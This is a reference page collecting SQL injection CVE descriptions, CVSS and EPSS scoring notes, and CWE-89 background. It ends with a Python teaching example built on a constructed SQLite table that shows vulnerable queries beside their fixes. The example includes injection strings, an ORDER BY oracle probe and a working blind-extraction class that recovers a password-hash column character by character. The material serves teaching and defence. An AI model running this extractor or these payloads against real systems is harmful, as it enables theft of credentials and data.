SQL injection CVE scores

This page collects score and description snippets for SQL injection CVEs as shown on NVD, EPSS, GitHub Advisory and vendor advisory pages. The capture interleaved them; they are regrouped below. Entries that end in "…" are cut off in the source and are left incomplete.

WHAT THE SCORES MEAN

CVSS base score. This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS). The per-CVE score tables list Base Score, Base Severity, CVSS Vector, Exploitability Score, Impact Score, Score Source and First Seen (headers survive for CVE-2010-0610, whose base score begins "7.", and CVE-2024-32838, whose base score begins "9."). In the vector, Attack Vector takes the values Network, Adjacent, Local or Physical, Attack Complexity takes Low or High, and Privileges Required, User Interaction, Scope and the Confidentiality, Integrity and Availability impacts complete it. Attack Complexity, in the CVSS v4.0 wording quoted on the page: this metric captures measurable actions that must be taken by the attacker to actively evade or circumvent existing built-in security-enhancing conditions in order to obtain a working exploit. These are conditions whose primary purpose is to increase security and/or increase exploit engineering complexity. A further definition ("A vulnerability exploitable without a target …") is cut off. Vendors also publish their own ratings on the same scale, for example "Important" with a maximum CVSSv3 base score of 8.6 (VMware, CVE-2025-22217) and "important" with a CVSSv4 score of 9.4 (Apache Fineract, CVE-2024-32838).

EPSS. The Exploit Prediction Scoring System (EPSS) score is the probability of exploitation activity in the next 30 days; a high score indicates an elevated risk that the vulnerability will be targeted. EPSS pages chart the score history over time, and some CVEs have no EPSS score yet (the page shows "We don't have an EPSS score for this CVE yet" for CVE-2025-2658). EPSS lookups appear for CVE-2012-2576, CVE-2013-5743, CVE-2015-2090, CVE-2015-7297, CVE-2015-7346, CVE-2017-8917, CVE-2018-6330, CVE-2020-14295, CVE-2020-29574, CVE-2021-41460, CVE-2021-41746, CVE-2023-40931, CVE-2024-2879, CVE-2024-6670, CVE-2024-8503, CVE-2024-9379, CVE-2024-10440, CVE-2024-48307, CVE-2025-0103, CVE-2025-0455, CVE-2025-1132, CVE-2025-2221, CVE-2025-22211 and CVE-2025-22217. The individual percentage values were separated from their CVEs in the capture and are not reproduced.

CWE-89. Almost every entry below is classified as CWE-89, Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'): the product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component.

Vulnerability history. NVD-derived pages carry a table of the changes made to a record over time (present on the page for CVE-2025-25517 and CVE-2025-25516, table contents not captured). Vulnerability history details can be useful for understanding the evolution of a vulnerability, and for identifying the most recent changes that may impact the vulnerability's severity, exploitability … Record metadata that survived: CVE-2021-27320, NVD published 03/24/2021; CVE-2023-39344, NVD published 08/04/2023, last modified 11/21/2024, source GitHub, Inc.; CVE-2024-39677, NVD published 07/08/2024, last modified 11/21/2024, source GitHub, Inc.; CVE-2025-22217, NVD published 01/28/2025, last modified 01/28/2025. Source: https://nvd.nist.gov.

SQL INJECTION IN GENERAL

SQL injection vulnerabilities occur when client-supplied data is included within an SQL query insecurely. SQL injection can typically be exploited to read, modify and delete SQL table data; in many cases it is also possible to exploit features … Attacks can result in unauthorized access to sensitive data, such as passwords, credit card details, or personal user information; many high-profile data breaches … Since SQL databases generally hold sensitive data, loss of confidentiality is a frequent problem with SQL injection vulnerabilities. If poorly constructed SQL commands are used to check user names and …

Input validation will not always prevent SQL injection, especially if you are required to support free-form text fields that could contain arbitrary characters. Parameterised queries remove the problem for values; identifiers (table, column and sort names, as in the Django order_by, Knex, phpMyAdmin designer and Liferay index-name entries below) cannot be bound as parameters and have to be checked against an allow-list.

MySQL Stored SQL Injection (CVE-2013-0375): a vulnerability in the MySQL Server database could allow a remote, authenticated user to inject SQL code that MySQL replication functionality would run with high privileges. A successful attack could allow any data in a remote MySQL database to be read or modified.

On scoring: one view quoted on the page is that, because SQL injection influences the confidentiality, integrity and availability of the application, it should be scored C:H/I:H/A:H. That is a reasonable default for an injection that executes arbitrary statements, but the impact metrics should reflect what the injection actually yields. A blind injection that only reads database contents is C:H/I:N/A:N unless the data read (credentials, API keys) gives further access, and an injection whose statements run in another security authority, as in the MySQL replication case, is the situation Scope: Changed exists for.

CVE ENTRIES ON THE PAGE

Oracle Database Server 10g (CVE id not on the page): SQL injection vulnerability allows remote authenticated users to execute arbitrary SQL commands with elevated privileges via the SUBSCRIPTION_NAME parameter in the (1) SYS.DBMS_CDC_SUBSCRIBE and (2) SYS.DBMS_CDC_ISUBSCRIBE packages, a different vector than CVE-2005-1197.
CVE-2010-0610: Multiple SQL injection vulnerabilities in the Photoblog (com_photoblog) component for Joomla! allow remote attackers to execute arbitrary SQL commands.
CVE-2012-2576: SQL injection vulnerability in the LoginServlet page in SolarWinds Storage Manager before 5.1.2, SolarWinds Storage Profiler before 5.1.2, and SolarWi…
CVE-2013-5743: Multiple SQL injection vulnerabilities in Zabbix 1.8.x before 1.8.18rc1, 2.0.x before 2.0.9rc1, and 2.1.x before 2.1.…
CVE-2015-2090: SQL injection vulnerability in the ajax_survey function in settings.php in the WordPress Survey and Poll plugin 1.5.7.3 for Wordpress allows remote atta…
CVE-2015-7297: SQL injection vulnerability in Joomla! 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, …
CVE-2015-7346: SQL injection vulnerability in ZCMS 1.…
CVE-2017-8917: SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers to execute arbitrary SQL commands via unspecified vectors.
CVE-2019-10752: Affected versions of sequelize are vulnerable to SQL Injection. The function sequelize.json() …
CVE-2019-13292: A SQL Injection issue was discovered in webERP 4.15. …
CVE-2019-14234 (Django): … JSONField, and key lookups for django.contrib.postgres.fields.HStoreField, were subject to SQL injection (affected-version clause cut off).
CVE-2020-7471: Django 1.11 before 1.11.28, 2.2 before 2.2.10, and 3.0 before 3.0.3 allows SQL Injection if untrusted data is used as a StringAgg delimiter (e.g., …).
CVE-2020-14295: A SQL injection issue in color.php in Cacti 1.2.12 allows an admin to inject SQL via the filter parameter.
CVE-2020-29574: An SQL injection vulnerability in the WebAdmin of Cyberoam OS through 2020-12-04 allows unauthenticated attackers to execute arbitrary SQL statements.
SonicWall SMA100 (CVE id not on the page): A SQL-Injection vulnerability in the SonicWall SSLVPN SMA100 product allows a remote unauthenticated attacker to perform SQL query to access username password and other session related information. This vulnerability impacts SMA100 build version 10.x.
CVE-2021-27320: Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via firstname parameter.
CVE-2021-35042: Django 3.1.x before 3.1.13 and 3.2.x before 3.2.5 allows QuerySet.order_by SQL injection if order_by is untrusted input from a client of a web application.
CVE-2021-41460: ECShop 4.…
CVE-2021-41746: SQL Injection vulnerability exists in all versions of Yonyou TurboCRM via the orgcode parameter in changepswd.php.
CVE-2022-22495: IBM i is vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. CVSS Base score: 6.…
CVE-2022-24815: SQL Injection when creating an application with Reactive SQL backend (advisory title).
CVE-2022-27479: SQL injection in apache-superset (advisory title).
Mybatis plus (CVE id not on the page): A SQL injection vulnerability in Mybatis plus below 3.… when executing SQL query, the parameters submitted by the user are not wrapped in quotation marks, which leads to SQL injection.
CVE-2023-30944: Moodle SQL Injection vulnerability (advisory title).
CVE-2023-39344: laravel-jqgrid vulnerable to SQL Injection (advisory title).
CVE-2023-39361: Cacti, a widely used operational monitoring tool, is vulnerable to a SQL injection flaw that may allow an attacker to perform code execution on successful exploitation. CVE-2023-39361 has a critical severity rating with a CVSS score of 9.8 out of a maximum of 10.
CVE-2023-40931: A SQL injection vulnerability in Nagios XI 5.11.1 and below allows authenticated attackers with announcement banner configuration privileges to execute arbitrary SQL commands via the ID parameter sent to the update_banner_message() function.
Nagios XI, second flaw (CVE id not on the page): A SQL injection vulnerability in Nagios XI v5.11.1 and below allows authenticated attackers with privileges to manage host escalations in the Core Configuration Manager to execute arbitrary SQL commands via the host escalation notification settings.
CVE-2024-2879: The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficie…
CVE-2024-6670: In WhatsUp Gold versions released before 2024.0.0, a SQL Injection vulnerability allows an unauthenticated attacker to retrieve the users encrypted p…
CVE-2024-8503: An unauthenticated attacker can leverage a time-based SQL injection vulnerability in VICIdial to enumerate database records. By default, VICIdial stor…
CVE-2024-9194: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Linux and Microsoft Windows Octopus Server on Windows, Linux allows SQL Injection. This issue affects Octopus Server: from 2024.1.12766 before 2024.1.13038, from 2024.2.9482 before … (remaining ranges cut off).
CVE-2024-9379: SQL injection in the admin web console of Ivanti CSA before version 5.0.2 allows a remote authenticated attacker with admin privileges to run arbitrar…
Palo Alto Networks Expedition, unauthenticated (CVE id not on the page): An SQL injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to reveal Expedition database contents, such as password hashes, usernames, device configurations, and device API keys.
CVE-2024-10440: The eHDR CTMS from Sunnet has a SQL Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary SQL command to read, modify …
CVE-2024-12909: a critical SQL injection vulnerability in LlamaIndex that can lead to remote code execution.
CVE-2024-32838 (Apache Fineract): SQL Injection vulnerability in various API endpoints - offices, dashboards, etc. Apache Fineract versions 1.9 and before have a vulnerability that allows an authenticated attacker to inject malicious data into some of the REST API endpoints' query parameter. Users are recommended to upgrade to version 1.10.1, which fixes this issue. Classified as "important" with a CVSSv4 score of 9.4, it affects endpoints including those related to offices and dashboards; authenticated attackers exploit it by manipulating a specific parameter in the request, allowing them to inject arbitrary SQL queries that could …
CVE-2024-42005: Django QuerySet.values() and values_list() methods on models with a JSONField are subject to SQL injection in column aliases via a crafted JSON object key as a passed *arg (affected-version clause cut off).
CVE-2024-42327: Zabbix, a widely used open-source monitoring solution, disclosed a severe SQL injection vulnerability rated critical with a CVSS score of 9.9. It is reachable by users with API access, including those with the default "User" role, and exposes Zabbix instances to potential compromise; patches are available and users should update.
CVE-2024-45387: An SQL injection vulnerability in Traffic Ops in Apache Traffic Control <= 8.0.1, >= 8.0.0 allows a privileged user with role "admin", "federation", "operations", "portal", or …
CVE-2025-0103: An SQL injection vulnerability in Palo Alto Networks Expedition enables an authenticated attacker to reveal Expedition database contents, such as password hashes, usernames, device configurations, and device API keys. With this, attackers can also create and read arbitrary files on the Expedition system.
CVE-2025-0455: The airPASS from NetVision Information has a SQL Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary SQL commands to read, modify, and …
CVE-2025-1094: tracked with a CVSS score of 8.1, affects the PostgreSQL interactive tool psql. As quoted on the page: "An attacker who can generate a SQL injection via CVE-2025-1094 can then achieve arbitrary code execution …"
CVE-2025-1132: A time-based blind SQL Injection vulnerability exists in the ChurchCRM 5.13.0 and prior EditEventAttendees.php component.
CVE-2025-2221: The WPCOM Member plugin for WordPress is vulnerable to time-based SQL Injection via the 'user_phone' parameter in all versions up to, and includin…
CVE-2025-22211: A SQL injection vulnerability in the JoomShopping component versions 1.… for Joomla allows authenticated attackers (administrator) …
CVE-2025-22217: VMware Avi Load Balancer contains an unauthenticated blind SQL Injection vulnerability which was privately reported to VMware. VMware has evaluated the severity of the issue to be in the Important severity range with a maximum CVSSv3 base score of 8.6. Known Attack Vectors: …
CVE-2025-22976: SQL Injection vulnerability in dingfanzuCMS v.1.0 allows a local attacker to execute arbitrary code via not filtering the content correctly at the "checkOrder.php" shopId module.
CVE-2025-25064: SQL injection vulnerability in the ZimbraSync Service SOAP endpoint in Zimbra Collaboration 10.0.x before 10.0.12 and 10.1.x before 10.1.4 due to insufficient sanitization of a user-supplied parameter. Zimbra has patched it (CVSS 9.8) together with other security bugs.
CVE-2025-25991: SQL Injection vulnerability in hooskcms v.… (HooskCMS SQL Injection Vulnerability).
Sophos Firewall (CVE id not on the page): A pre-auth SQL injection vulnerability in the email protection feature of Sophos Firewall versions older than 21.0 MR1 (21.0.1) allows access to the reporting database and can lead to remote code execution if a specific configuration of Secure PDF eXchange (SPX) is enabled in combination with the firewall running in High Availability (HA) mode.
F5 BIG-IP (CVE id not on the page): An authenticated SQL injection vulnerability exists in the BIG-IP Configuration utility which may allow an authenticated attacker with network access to the Configuration utility through the BIG-IP management port and/or self IP addresses to …
Liferay (CVE id not on the page): SQL injection vulnerability in the upgrade process for SQL Server in Liferay Portal 7.… through 7.4.3.17, and Liferay DXP 7.3 before update 6, and 7.4 before update 18 allows attackers to execute arbitrary SQL commands via the name of a database table's primary key index.
Knex.js (CVE id not on the page): Knex.js through 2.3.0 has a limited SQL injection vulnerability that can be exploited to ignore the WHERE clause of a SQL query.
phpMyAdmin (GitHub Reviewed advisory, published May 24, 2022 to the GitHub Advisory Database, updated Apr 24, 2024, High severity): A crafted database/table name can be used to trigger a SQL injection attack through the designer feature.
b2evolution (CVE id not on the page): SQL Injection in the "evoadm.php" component of b2evolution v7.2.2-stable allows remote attackers to obtain sensitive database information by injecting SQL commands into the "cf_name" parameter when creating a new filter under the "Collections" tab.
vanna-ai/vanna (CVE id not on the page): version v0.3.4 is vulnerable to SQL injection in some file-critical functions such as pg_read_file(). This vulnerability allows unauthenticated remote users to read arbitrary local files on the victim server, including sensitive files like /etc/passwd, by exploiting the exposed SQL queries via a Python Flask API.
Casdoor (CVE id not on the page): On Jan 22, 2022, a high severity SQL Injection vulnerability was reported in Casdoor which affected versions before 1.13.1.
NHibernate (CVE id not on the page): A SQL injection vulnerability exists in some types implementing ILiteralType.ObjectToSQLString.
Seacms (CVE id not on the page): Seacms <= 13.0 has SQL injection vulnerability, which can be exploited by attackers to obtain sensitive information.
Mingsoft MCMS (CVE id not on the page): MCMS v5.… was discovered to contain a SQL injection vulnerability via the categoryType parameter at /content/list.do.
CM Informatics CM News (CVE id not on the page): Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability allows SQL Injection. This issue affects CM …
TMT Lockcell (CVE id not on the page): Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability allows SQL Injection. This issue affects Lockcell: before …
Further titles and fragments whose id or product is cut off: SQL injection vulnerability in Meshery; There is SQL injection vulnerability in Esri ArcGIS …; SQL Injection in GitHub repository pimcore/pimcore prior to 10.…; SQL Injection vulnerability in Koha Library Software 23.…; PEEL Shopping version 9.…; The "Duplicate Post" WordPress plugin up to and including version 1.…; TeamPass 3.…; In SpringBlade V3.…; … 1 allows remote attackers to execute arbitrary SQL commands via the tenant ID value; … 3 is vulnerable to SQL Injection in admin_reslib.php and in admin_paylog.php; … 1 allows a remote attacker to obtain sensitive information via the /install/index.php …; … 0 allows remote SQL injection; This vulnerability has been fixed in version 2.…; A SQL injection vulnerability in the project allows UNION based injections, …; A public user/guest (unauthenticated) can inject a malicious SQL query in order to affect the execution of predefined SQL commands; This vulnerability is only exploitable when chained with other attacks; The vulnerability is classified under CWE-89 and has a CVSS score of 10.0, indicating its severity and potential impact on affected systems; a GitHub Advisory entry (High severity, unreviewed, published Oct 11, 2023, updated Apr 11, 2024) whose title is cut off.
VulDB-style summaries with the product cut off: The manipulation with an unknown input leads to a sql injection vulnerability. The manipulation of the argument searchdata leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Impacted is confidentiality, integrity, and availability; price estimate $0-$5k. CWE is classifying the issue as CWE-89.
CVE ids referenced without a recoverable description: CVE-2018-6330, CVE-2019-18622, CVE-2021-4262, CVE-2023-1545, CVE-2023-3673, CVE-2023-25838, CVE-2023-46575, CVE-2023-50578, CVE-2024-39677, CVE-2024-45875, CVE-2024-45876, CVE-2024-48307, CVE-2025-2658, CVE-2025-25516, CVE-2025-25517.

One entry on the page is not a SQL injection at all and came from a "recently published" sidebar: a security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead to sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.
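The following is an added example written for this page; it is not code from any product, advisory or scoring site listed above. It uses a constructed in-memory SQLite schema (a users table with a pw_hash column, invented for the example) to show the three mechanics the notes and catalogue describe: a value spliced into a string literal (the "parameters not wrapped in quotation marks" and login-check cases), an identifier spliced into ORDER BY where quoting cannot help (the order_by, Knex and designer-feature cases), and why a bare yes/no answer is enough to enumerate records (the time-based and blind cases). Beside each vulnerable function is the fix: a bound parameter for the value, an allow-list for the identifier. All function and table names are the example's own.

```python
import sqlite3

# Constructed sample schema and data for this example; not any real product's schema.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pw_hash TEXT);
        INSERT INTO users VALUES (1, 'alice', 'h-alice'), (2, 'bob', 'h-bob');
    """)
    return conn

# 1. Untrusted value spliced into a string literal: the CWE-89 textbook case.
def user_exists_vulnerable(conn, name):
    # Attacker text becomes part of the statement; a quote lets it break out of the literal.
    sql = "SELECT COUNT(*) FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchone()[0] > 0

def user_exists_safe(conn, name):
    # Bound parameter: the value never passes through the SQL parser, so no escaping is needed.
    row = conn.execute("SELECT COUNT(*) FROM users WHERE name = ?", (name,)).fetchone()
    return row[0] > 0

# 2. Untrusted identifier (ORDER BY column): parameters cannot bind here, so quoting never helps.
def list_users_vulnerable(conn, order_by):
    return conn.execute("SELECT id, name FROM users ORDER BY " + order_by).fetchall()

ALLOWED_ORDER_COLUMNS = {"id", "name"}

def list_users_safe(conn, order_by, descending=False):
    # Allow-list the identifier, then quote it as an identifier; direction is a fixed keyword.
    if order_by not in ALLOWED_ORDER_COLUMNS:
        raise ValueError(f"unsupported sort column: {order_by!r}")
    direction = "DESC" if descending else "ASC"
    return conn.execute(f'SELECT id, name FROM users ORDER BY "{order_by}" {direction}').fetchall()

# 3. Why a yes/no answer is enough: blind extraction through the vulnerable check in (1).
class BlindExtractor:
    """Recovers a secret column one character at a time from a boolean oracle.

    A time-based variant is the same algorithm with a measured delay as the signal
    instead of a True/False response."""

    def __init__(self, oracle):
        self.oracle = oracle   # callable(name) -> bool, e.g. the vulnerable login check
        self.queries = 0

    def ask(self, condition):
        self.queries += 1
        # 'nobody' matches no row, so the row count (and the answer) depends only on `condition`.
        return self.oracle(f"nobody' OR ({condition}) AND '1'='1")

    def int_value(self, expr, lo, hi):
        # Binary search for the integer value of `expr`, which must lie in [lo, hi].
        while lo < hi:
            mid = (lo + hi) // 2
            if self.ask(f"{expr} > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        return lo

    def extract_pw_hash(self, user_id, max_len=64):
        sub = f"FROM users WHERE id = {int(user_id)}"
        length = self.int_value(f"(SELECT length(pw_hash) {sub})", 0, max_len)
        # Printable ASCII only; widen the range for other character sets.
        return "".join(
            chr(self.int_value(f"(SELECT unicode(substr(pw_hash, {pos}, 1)) {sub})", 32, 126))
            for pos in range(1, length + 1)
        )

if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, injected:", user_exists_vulnerable(conn, "x' OR '1'='1"))   # True
    print("safe, injected:     ", user_exists_safe(conn, "x' OR '1'='1"))         # False
    ext = BlindExtractor(lambda name: user_exists_vulnerable(conn, name))
    print("extracted:", ext.extract_pw_hash(1), "in", ext.queries, "queries")
```

The ORDER BY case is worth running against a probe such as `(CASE WHEN (SELECT pw_hash FROM users WHERE id = 1) LIKE 'h-a%' THEN id ELSE -id END)`: the first row returned flips depending on whether the guess is right, so even an identifier position with no quotes in it is a usable oracle. Against `user_exists_safe` the extractor gets a False answer to every question and recovers nothing, which is the property a fix has to have; filtering quote characters from `name` would not give it, since the identifier injection contains none.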